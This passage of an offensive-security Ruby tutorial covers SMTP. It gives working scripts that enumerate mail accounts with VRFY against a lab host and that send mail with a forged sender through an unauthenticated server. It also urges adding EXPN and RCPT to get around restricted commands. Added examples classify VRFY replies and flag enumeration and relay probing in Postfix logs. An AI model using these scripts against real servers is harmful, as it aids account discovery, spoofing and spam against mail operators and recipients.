Interacting with SMTP is easy, since the protocol is straightforward. We can use the VRFY command to check whether a user or email address exists:
```ruby
#!/usr/bin/env ruby
# KING SABRI | @KINGSABRI
#
require 'socket'

# Candidate account names to check with VRFY
users = %w{root rubyfu www apache2 bin daemon sshd gdm nobody ftp operator postgres mysqld}
found = []

@s = TCPSocket.new('192.168.0.19', 25)
@banner = @s.recv(1024).chomp   # the 220 greeting line
users.each do |user|
  @s.send "VRFY #{user}\r\n", 0   # SMTP lines end with CRLF
  resp = @s.recv(1024).chomp
  # Postfix answers a known user with "252 2.0.0 <name>", so the name is the third token
  found << user if resp.split[2] == user
end
@s.close

puts "[*] Result:-"
puts "[+] Banner: " + @banner
puts "[+] Found users: \n#{found.join("\n")}"
```
Results
```
[*] Result:-
[+] Banner: 220 VulnApps.localdomain ESMTP Postfix
[+] Found users:
root
rubyfu
www
bin
daemon
sshd
gdm
nobody
ftp
operator
postgres
```
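The script above relies on `recv(1024)` and on the user name being the third word of the reply, which is fragile: multi-line replies (EHLO) need several reads, and a server that has VRFY disabled answers with a 502 that should be reported as "disabled", not silently treated as "not found". The following is an added example, not code from the RubyFu page: it reads one complete SMTP reply (handling `250-` continuation lines) and classifies a VRFY answer by reply code, which is also the check to run against your own mail server to confirm that VRFY is switched off. The canned replies and the `CannedServer` stand-in are constructed so the script runs offline; `read_reply` works unchanged on a `TCPSocket`, since both respond to `gets` and `write`.

```ruby
#!/usr/bin/env ruby
# Added example (not from the original page): robust SMTP reply reading and
# VRFY classification. Server replies below are constructed for the demo.
require 'stringio'

# Read one complete SMTP reply. Multi-line replies use "CODE-" continuation
# lines and end with "CODE " (code followed by a space or end of line).
# Returns [code, lines].
def read_reply(io)
  lines = []
  loop do
    line = io.gets
    raise EOFError, 'connection closed mid-reply' if line.nil?
    line = line.chomp
    lines << line
    break if line =~ /\A\d{3}( |\z)/
  end
  [lines.last[0, 3].to_i, lines]
end

# Map a VRFY reply code to an outcome instead of guessing from the text.
#   :exists   250 (verified) or 252 ("cannot verify, will accept"; Postfix
#             sends 252 only for addresses it would accept)
#   :unknown  550/551/553 - the server rejects the address
#   :disabled 500/502 - command not implemented or disabled
#             (e.g. Postfix with disable_vrfy_command = yes)
#   :tempfail 4yz - try again later
def classify_vrfy(code)
  case code
  when 250, 252 then :exists
  when 550, 551, 553 then :unknown
  when 500, 502 then :disabled
  when 400..499 then :tempfail
  else :other
  end
end

# Run VRFY for each name over any IO that speaks SMTP (socket or stand-in).
def vrfy_check(io, names)
  _greeting = read_reply(io)   # consume the 220 banner first
  names.each_with_object({}) do |name, results|
    io.write("VRFY #{name}\r\n")
    code, _lines = read_reply(io)
    results[name] = classify_vrfy(code)
  end
end

# Constructed stand-in for a server: replies are served in order from a
# StringIO, and everything the client sends is recorded in #sent.
class CannedServer
  attr_reader :sent
  def initialize(replies)
    @in = StringIO.new(replies.join)
    @sent = []
  end
  def gets; @in.gets; end
  def write(s); @sent << s; s.bytesize; end
end

# Constructed replies in Postfix wording: one known user, one unknown,
# then the answer of a server that has VRFY disabled.
CANNED_REPLIES = [
  "220 mail.example.test ESMTP\r\n",
  "252 2.0.0 root\r\n",
  "550 5.1.1 <nosuch>: Recipient address rejected: User unknown in local recipient table\r\n",
  "502 5.5.1 VRFY command is disabled\r\n",
].freeze

def demo
  vrfy_check(CannedServer.new(CANNED_REPLIES), %w[root nosuch www])
end

puts demo.inspect if $PROGRAM_NAME == __FILE__
```

To use it against a real host, replace `CannedServer.new(...)` with `TCPSocket.new(host, 25)`; a result of `:disabled` for every name is what a hardened server should produce.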
Your turn: there are other commands that can be used, such as EXPN and RCPT. Enhance the above script to include all these commands, so you can work around restricted commands that you might face. More SMTP commands are listed here.
An SMTP server that does not require authentication can be abused to send emails that appear to come from anyone:
```ruby
#!/usr/bin/env ruby

require 'socket'

# One recipient address per line
users = File.read('emails.txt').split("\n")

@s = TCPSocket.new('example.org', 25)
@banner = @s.recv(1024).chomp   # the 220 greeting line
users.each do |user|
  @s.send "MAIL FROM:<noraj@example.org>\r\n", 0
  @s.send "RCPT TO:<#{user}>\r\n", 0
  @s.send "DATA\r\n", 0
  @s.send "email body here\r\n.\r\n", 0   # a line containing only "." ends the message
  resp = @s.recv(1024).chomp
  puts resp
end
@s.close

puts "[*] Result:-"
puts "[+] Banner: " + @banner
```
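Both activities on this page leave a recognisable trace on the server side: user enumeration shows up as a burst of "User unknown" rejections from one client, and relay attempts as "Relay access denied". The following is an added example, not part of the RubyFu page: it tallies those rejections per client IP from Postfix-style `smtpd` log lines and flags clients that look like they are probing. The log lines are constructed in the usual `NOQUEUE: reject: RCPT from ...` shape; the exact reason text and reply codes on your server depend on its configuration, so the two substring patterns are an assumption to adjust, and the threshold of three unknown recipients is an arbitrary starting point.

```ruby
#!/usr/bin/env ruby
# Added example (not from the original page): spot enumeration and relay
# probing in Postfix-style smtpd rejection log lines. The lines below are
# constructed sample data, not real server output.

SAMPLE_LOG = <<~'LOG'
  Jan 10 10:00:01 mx postfix/smtpd[2101]: NOQUEUE: reject: RCPT from unknown[203.0.113.7]: 550 5.1.1 <alice@example.org>: Recipient address rejected: User unknown in local recipient table; from=<sender@example.net> to=<alice@example.org> proto=ESMTP helo=<probe>
  Jan 10 10:00:02 mx postfix/smtpd[2101]: NOQUEUE: reject: RCPT from unknown[203.0.113.7]: 550 5.1.1 <bob@example.org>: Recipient address rejected: User unknown in local recipient table; from=<sender@example.net> to=<bob@example.org> proto=ESMTP helo=<probe>
  Jan 10 10:00:02 mx postfix/smtpd[2101]: NOQUEUE: reject: RCPT from unknown[203.0.113.7]: 550 5.1.1 <carol@example.org>: Recipient address rejected: User unknown in local recipient table; from=<sender@example.net> to=<carol@example.org> proto=ESMTP helo=<probe>
  Jan 10 10:00:03 mx postfix/smtpd[2102]: NOQUEUE: reject: RCPT from unknown[203.0.113.7]: 554 5.7.1 <someone@example.com>: Relay access denied; from=<sender@example.net> to=<someone@example.com> proto=ESMTP helo=<probe>
  Jan 10 10:05:00 mx postfix/smtpd[2103]: NOQUEUE: reject: RCPT from mail.partner.test[198.51.100.5]: 550 5.1.1 <typo@example.org>: Recipient address rejected: User unknown in local recipient table; from=<joe@partner.test> to=<typo@example.org> proto=ESMTP helo=<mail.partner.test>
  Jan 10 10:06:00 mx postfix/smtpd[2104]: 4F2A1C0: client=mail.partner.test[198.51.100.5]
LOG

# Pulls client IP, reply code, recipient and rejection reason out of a
# "NOQUEUE: reject: RCPT from host[ip]: CODE x.y.z <rcpt>: reason; ..." line.
REJECT_RE = /NOQUEUE: reject: RCPT from \S+\[(?<ip>[\d.]+)\]: (?<code>\d{3}) \S+ <(?<rcpt>[^>]*)>: (?<reason>[^;]+)/

# Count rejection kinds per client IP. Lines that are not rejections are skipped.
def tally_rejects(log_text)
  stats = Hash.new { |h, k| h[k] = { unknown_user: 0, relay_denied: 0, rcpts: [] } }
  log_text.each_line do |line|
    m = REJECT_RE.match(line) or next
    s = stats[m[:ip]]
    s[:rcpts] << m[:rcpt]
    if m[:reason].include?('User unknown')            # assumed Postfix wording
      s[:unknown_user] += 1
    elsif m[:reason].include?('Relay access denied')  # assumed Postfix wording
      s[:relay_denied] += 1
    end
  end
  stats
end

# A client is flagged when it hits the unknown-recipient threshold (looks
# like VRFY/RCPT-style enumeration) or triggers any relay denial at all.
def suspicious_clients(log_text, unknown_threshold: 3)
  flagged = tally_rejects(log_text).select do |_ip, s|
    s[:unknown_user] >= unknown_threshold || s[:relay_denied] > 0
  end
  flagged.keys
end

if $PROGRAM_NAME == __FILE__
  tally_rejects(SAMPLE_LOG).each do |ip, s|
    puts "#{ip}: #{s[:unknown_user]} unknown users, #{s[:relay_denied]} relay denials"
  end
  puts "flagged: #{suspicious_clients(SAMPLE_LOG).join(', ')}"
end
```

A single "User unknown" from a known partner host (a typo) stays below the threshold, while the probing client is flagged on both counts; feed the functions `File.read('/var/log/mail.log')` to run them over a real log.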